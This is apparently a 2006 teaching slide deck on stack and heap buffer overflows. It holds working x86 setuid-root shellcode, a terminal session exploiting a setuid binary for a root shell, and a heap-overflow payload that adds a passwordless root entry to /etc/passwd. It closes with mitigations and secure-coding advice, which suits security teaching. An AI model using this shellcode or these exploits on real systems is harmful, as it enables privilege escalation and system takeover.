Software Exploits
How the Black Hats do what they do—Stack Overflows
(or how a 1337 h4x0r can pwn your system)
Kevin C. Smallwood
March 2006
What will we cover?
• What are buffer overflows?
• What is the problem?
• What is shellcode?
• How are functions called?
• How is a stack buffer overflow exploited?
  – One method
• Which programming methods should I follow?
What is a buffer overflow?
• Four types:
  – Stack overflows
  – Heap overflows
  – Integer overflows
  – Format string overflows
• Examples:
  – gets(buffer); (exploited by the Morris worm through fingerd)
  – strcpy(dest_little_buffer, src_big_input_buffer);
• Not necessarily a problem:
  – strcpy(internal_buffer1, internal_buffer2);
The problem on the stack
• The stack grows down from high memory to low memory
  – Black Hats look for buffer overflows to rewrite the return address on the stack so that their code is executed instead of the normal program flow.
• Goal: Take over the processor’s instruction pointer
  – When calling a function, certain things are pushed onto the stack:
    • Called function’s parameters in reverse order
    • Extended Instruction Pointer (eip) (return address)
    • Calling function’s ebp (stack frame pointer)
    • Called function’s local variables
  – By overflowing space on the stack, the return address can be changed to execute “shellcode” or cause a crash (Denial of Service (DoS))
Shellcode
• No, it is not shell scripting
• It is code (payload) to spawn a shell, usually with privileges (like “root”)
  – A remote exploit may just supply a toehold into the system
• It may execute a program function to grant a desired outcome
  – Gambling program where the player always wins
• It may execute a library function
  – execve()
Simple example program
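#include <stdio.h>
#include <string.h>

/* Deliberately vulnerable: name[] holds 400 bytes, but strcpy()
   copies temp2 without checking its length. */
void greeting(char *temp1, char *temp2)
{
    char name[400];
    strcpy(name, temp2);
    printf("Hello %s %s\n", temp1, name);
}

int main(int argc, char *argv[])
{
    greeting(argv[1], argv[2]);
    printf("Bye %s %s\n", argv[1], argv[2]);
    return 0;
}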
Typical execve() program stack
(listed from high memory down to low memory)
High Memory
Bottom of Stack (0xBFFFFFFC): 4-byte null
Full pathname of executable, null-terminated (starting address can easily be calculated: /bin/ls is 8 bytes)
env strings, null-terminated (TERM=vt100, etc.)
argv strings, null-terminated (argv[0], argv[1], etc.)
zero-filled padding, 0 to 8064 bytes
112 bytes of ELF interpreter information
env pointers
argv pointers
runtime data (from _start, etc.)
Parameters to main(): envp, argv, argc
Top of Stack
Low Memory
How are functions called?
• Items are pushed on to the stack when functions are called.
• The stack frame pointer and instruction pointer are popped off the stack upon return.
Function Call
mov 0xc(%ebp),%eax
add $0x8,%eax
pushl (%eax)
mov 0xc(%ebp),%eax
add $0x4,%eax
pushl (%eax)
call 0x804835c
High Memory
temp2                    } parameters to greeting(char *temp1, char *temp2)
temp1                    }
Return Address (eip)
Low Memory
Function Prolog
push %ebp
mov %esp,%ebp
sub $0x190,%esp
High Memory
temp2
temp1
Return Address (eip)
Calling function’s ebp   <- ebp
name[400]                <- esp (char name[400];)
Low Memory
Function Epilog
leave
ret
High Memory
temp2
temp1
Return Address (eip)
Calling function’s ebp   <- ebp, esp
name[400]
Low Memory
Even simpler code example:
int foo() {
    char buf[9];
    strcpy(buf, "my ident");
}
What happens to the stack?
int foo() {
    char buf[9];
    strcpy(buf, "my ident");
}
stuff
more stuff
Return Address
Saved Frame Pointer
What happens to the stack?
int foo() {
    char buf[9];
    strcpy(buf, "my ident");
}
stuff
more stuff
Return Address
Saved Frame Pointer
buf (filled one byte at a time by strcpy()):
  'm' 'y' ' ' 'i'
  'd' 'e' 'n' 't'
  null
What happens to the stack?
int foo() {
    char buf[9];
    strcpy(buf, "my ident");
}
stuff
more stuff
Return Address
Saved Frame Pointer
buf:
  6D 79 20 69
  64 65 6E 74
  00
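The byte values in the frame above can be checked with a small helper. This is a minimal sketch, not part of the original slides; the name bytes_to_hex is hypothetical.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not from the slides): format the n bytes at src as
 * uppercase hex pairs separated by single spaces.
 * Needs 3 * n bytes of output: 2 digits per byte, n - 1 spaces, 1 NUL.
 * Returns 0 on success, -1 if out is too small. */
int bytes_to_hex(const void *src, size_t n, char *out, size_t out_size)
{
    const unsigned char *p = src;
    size_t i;

    if (out == NULL || out_size == 0 || n > out_size / 3)
        return -1;

    out[0] = '\0';
    for (i = 0; i < n; i++) {
        char *dst = out + i * 3;
        size_t left = out_size - i * 3;

        if (i + 1 < n)
            snprintf(dst, left, "%02X ", (unsigned)p[i]);
        else
            snprintf(dst, left, "%02X", (unsigned)p[i]);
    }
    return 0;
}
```

Called on the string literal "my ident" with n = 9 (eight characters plus the terminating null), it produces 6D 79 20 69 64 65 6E 74 00, which fills buf[9] exactly.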
What happens to the stack? Black Hat Style
int foo() {
    char buf[9];
    strcpy(buf, "smash that stack\x8E\xFF\xFF\xBF");
}
stuff
more stuff
Return Address
Saved Frame Pointer
What happens to the stack? Black Hat Style
int foo() {
    char buf[9];
    strcpy(buf, "smash that stack\x8E\xFF\xFF\xBF");
}
stuff
more stuff
Return Address
Saved Frame Pointer
Written one byte at a time by strcpy(), from buf[0] toward high memory:
  's' 'm' 'a' 's'
  'h' ' ' 't' 'h'
  'a' 't' ' ' 's'
  't' 'a' 'c' 'k'
  8E FF FF BF
What happens to the stack? Black Hat Style
int foo() {
    char buf[9];
    strcpy(buf, "smash that stack\x8E\xFF\xFF\xBF");
}
stuff
more stuff
Return Address
Saved Frame Pointer
Written from buf[0] toward high memory:
  73 6D 61 73
  68 20 74 68
  61 74 20 73
  74 61 63 6B
  8E FF FF BF   <- lands on the Return Address
What is significant about the return address?
• Remember little endian
  – Address is really 0xBFFFFF8E
  – This is up in the environment variable area
• What if the Black Hat set an env variable to shellcode? (export sc=`cat shellcode`)
  – We would jump into that shellcode and start execution!
stuff
more stuff
Return Address
Saved Frame Pointer
Written from buf[0] toward high memory:
  73 6D 61 73
  68 20 74 68
  61 74 20 73
  74 61 63 6B
  8E FF FF BF
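The little-endian point can be made concrete with a few lines of C. This is a minimal sketch; le32_decode is a hypothetical name, and the decoding is written out with shifts so it gives the same answer on any host.

```c
#include <stdint.h>

/* Hypothetical helper (not from the slides): interpret four bytes, in the
 * order they sit in memory, as a 32-bit little-endian value. The byte at
 * the lowest address is the least significant. */
uint32_t le32_decode(const unsigned char b[4])
{
    return (uint32_t)b[0]
         | ((uint32_t)b[1] << 8)
         | ((uint32_t)b[2] << 16)
         | ((uint32_t)b[3] << 24);
}
```

For the bytes 8E FF FF BF in memory order, this returns 0xBFFFFF8E, the address quoted on this slide.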
More about shellcode
• Most of the time, shellcode cannot include any zero bytes, since a zero byte is the NUL string terminator
  – It will terminate strings in many programming languages
• Our shellcode will just represent the binary machine code to spawn a shell
  – We are looking to exploit buffer overflows in setuid root programs in order to get a root shell
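Why a zero byte matters: string functions such as strcpy() and strlen() stop at the first zero byte, so anything after it is never copied. A minimal sketch of a check for this, using placeholder bytes only; first_zero_byte is a hypothetical name.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper (not from the slides): return the index of the first
 * zero byte in buf[0..n), or n if the buffer contains none. A string copy
 * would stop at that index. */
size_t first_zero_byte(const unsigned char *buf, size_t n)
{
    const unsigned char *z = memchr(buf, 0, n);

    return z != NULL ? (size_t)(z - buf) : n;
}
```

For the four bytes 41 42 00 43 the result is 2, the same length strlen() reports, so the trailing 43 would be lost in a string copy.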
Classic shell-spawning shellcode
• Essentially:
#include <unistd.h>

int main(void) {
    char *name[2];
    setreuid(0, 0);
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
    return 1;   /* reached only if execve() fails */
}
Classic shell-spawning shellcode
BITS 32
; setreuid(uid_t ruid, uid_t euid)
xor eax, eax        ; first eax must be 0 for the next instruction
mov al, 70          ; put 70 into eax, since setreuid is syscall #70
xor ebx, ebx        ; put 0 into ebx, to set real uid to root
xor ecx, ecx        ; put 0 into ecx, to set effective uid to root
int 0x80            ; call the kernel to make the system call happen

; execve(const char *filename, char *const argv[], char *const envp[])
push ecx            ; push 4 bytes of null from ecx to the stack
push 0x68732f2f     ; push "//sh" to the stack
push 0x6e69622f     ; push "/bin" to the stack
mov ebx, esp        ; put the address of "/bin//sh" into ebx, via esp
push ecx            ; push 4 bytes of null from ecx to the stack
push ebx            ; push ebx to the stack
mov ecx, esp        ; put the address of ebx to ecx, via esp
xor edx, edx        ; put 0 into edx
mov al, 11          ; put 11 into eax, since execve() is syscall #11
int 0x80            ; call the kernel to make the syscall happen
Classic shell-spawning shellcode
export shellcode=`perl -e 'print "\x31\xC9\x31\xDB\x31\xC0\xB0\x46\xCD\x80\x51\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x51\x53\x89\xE1\x31\xD2\xB0\x0B\xCD\x80";'`
33 bytes! Fairly small payload.
genv program
• Get the address of an environment variable
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
    char *addr;
    if (argc < 2) {
        printf("Usage:\n%s <environment variable name>\n", argv[0]);
        exit(0);
    }
    addr = getenv(argv[1]);
    if (addr == NULL)
        printf("The environment variable %s doesn't exist.\n", argv[1]);
    else
        printf("%s is located at %p\n", argv[1], (void *)addr);
    return 0;
}
Put the exploit together
$ ls -l vuln
-rwsr-xr-x 1 root root 6265 Nov 14 14:40 vuln
$ export shellcode=`perl -e 'print "\x31\xC9\x31\xDB\x31\xC0\xB0\x46\xCD\x80\x51\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x51\x53\x89\xE1\x31\xD2\xB0\x0B\xCD\x80";'`
$ ./genv shellcode
shellcode is located at 0xbffffd8e
$ ./vuln `perl -e 'print "\x8e\xfd\xff\xbf"x5;'`
# whoami
root
#
What does the program stack look like?
• 0xBFFFFD8E points at our “shellcode” environment variable value (the code to spawn a shell).
stuff
more stuff
Return Address
Saved Frame Pointer
8E FD FF BF
8E FD FF BF
8E FD FF BF
8E FD FF BF
8E FD FF BF
Is this a problem in OSS?
• CVE-1999-0042: Buffer overflow in University of Washington’s implementation of IMAP and POP servers
• CVE-2000-0389–CVE-2000-0392: Various buffer overflows in Kerberos
• BugTraq ID 16141: Linux kernel sysctl_string local buffer overflow vulnerability
• BugTraq ID 16142: Linux kernel DVB driver local buffer overflow vulnerability
Methods of stopping stack buffer overflows
• Red Hat’s exec shield starts the bottom of the stack at a random location for each new task
  – Pro: Difficult to determine the address of shellcode
  – Con: Mainline kernel doesn’t include exec shield
• Non-executable stack
  – Pro: Stops most common exploits
  – Con: An attacker can still execute library functions or shellcode loaded elsewhere
Be a better software engineer!
• Understand how and when buffers can be overflowed
• Use code reviews to look for unprotected copies of attacker-provided input into buffers
  – Replace dangerous string handling functions
• Sanitize input! NEVER trust user input!
• Use analysis tools
  – Coverity, PREfast, Klocwork
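As one illustration of replacing a dangerous string function, here is a minimal sketch of a bounded counterpart to the greeting() example from earlier in the deck. It formats with snprintf(), which never writes more than the size it is given. The name greeting_bounded and its return convention are assumptions for illustration, not something from the original program.

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical bounded variant of greeting() (not from the slides).
 * Formats the greeting into out, writing at most out_size bytes including
 * the terminating NUL. Returns 0 if the whole greeting fit, -1 if it was
 * truncated or the arguments were invalid. */
int greeting_bounded(char *out, size_t out_size,
                     const char *temp1, const char *temp2)
{
    int n;

    if (out == NULL || out_size == 0 || temp1 == NULL || temp2 == NULL)
        return -1;

    n = snprintf(out, out_size, "Hello %s %s\n", temp1, temp2);
    if (n < 0 || (size_t)n >= out_size)
        return -1;   /* output was cut short; caller decides what to do */

    return 0;
}
```

The caller passes sizeof on the destination array, so the size limit travels with the buffer instead of being assumed. Overlong input is reported through the return value rather than silently overrunning the stack.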
What did we cover?
• What are buffer overflows?
• What is the problem?
• What is shellcode?
• How are functions called?
• How is a stack buffer overflow exploited?
• Which programming methods should I follow?
For more information
• Gray Hat Hacking, Harris, et al., 2005
• Hacking: The Art of Exploitation, Erickson, 2003
• The Shellcoder’s Handbook, Koziol, et al., 2004
• Secure Coding in C and C++, Seacord, 2006
• 19 Deadly Sins of Software Security, Howard, et al., 2005
Questions? Feedback?
Part 2: Overflows in the Heap
• Currently a work in progress
Heap overflows
• Different attack method
  – Much harder to find!
  – Goal is still to control a privileged program
  – These exploits happen in the heap and bss memory segments
  – Depend on important variables being stored in the heap/bss segment
    • Adjacent variables (e.g., file names)
    • Permissions or authentication values
    • Function pointers
  – Key: Never trust user input!
Heap overflow program #1: Adjacent variable corruption
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
    FILE *fd;
    char *userinput = malloc(20);
    char *outputfile = malloc(20);
    if (argc < 2) {
        printf("Usage: %s <string to be written to /tmp/notes>\n", argv[0]);
        exit(0);
    }
    strcpy(outputfile, "/tmp/notes");
    strcpy(userinput, argv[1]);   /* unbounded copy: the flaw being demonstrated */
    fd = fopen(outputfile, "a");
    if (fd == NULL) {
        fprintf(stderr, "error opening %s\n", outputfile);
        exit(1);
    }
    fprintf(fd, "%s\n", userinput);
    fclose(fd);
    return 0;
}
Heap overflow program #1: Adjacent variable corruption
• Important things to note:
  – Order of the variable definitions and mallocs
    • The heap grows to high memory
  – Use of unbounded strcpy
  – The order of the strcpys
• In other words, many things have to be in place, however:
  – Never trust user provided input!
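The unbounded strcpy noted above is the piece a programmer controls directly. One possible fix, sketched here under the assumption that overlong input should be rejected rather than truncated, is to check the length before copying. The name copy_checked is hypothetical.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper (not from the slides): copy src into dst only if the
 * whole string, including its terminating NUL, fits in dst_size bytes.
 * Returns 0 on success. Returns -1 and leaves dst as an empty string if
 * src is too long or an argument is invalid. */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    size_t len;

    if (dst == NULL || dst_size == 0 || src == NULL)
        return -1;

    len = strlen(src);
    if (len >= dst_size) {
        dst[0] = '\0';
        return -1;
    }

    memcpy(dst, src, len + 1);   /* len + 1 copies the NUL as well */
    return 0;
}
```

With a 20-byte destination, a short note is copied as usual, while any argument of 20 or more characters is refused before a single byte lands outside the allocation.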
Heap overflow exploit: Adjacent variable corruption
• Let’s overwrite the output file name
  – Instead of /tmp/notes, /etc/passwd!
  – 20 bytes malloced, but 24 bytes between variables
    • Overflow the userinput variable 24 bytes and then into the outputfile variable
    • userinput comes from command line (argv[1])
  – Never trust user provided input!
Heap overflow exploit: Adjacent variable corruption
• Since this program writes a string to a file, let’s write a string to /etc/passwd
• Can we overflow into outputfile the string “/etc/passwd”?
  – “myroot::0:0:m:/root:/tmp/etc/passwd”
    • “myroot::0:0:m:/root:/tmp” is 24 bytes
    • “/etc/passwd” overflows into the outputfile
myroot::0:0:m:/root:/tmp/etc/passwd
00000000011111111112222222222333333
12345678901234567890123456789012345
• How do we make “/tmp/etc/passwd” a shell?
  – mkdir /tmp/etc; ln -s /bin/sh /tmp/etc/passwd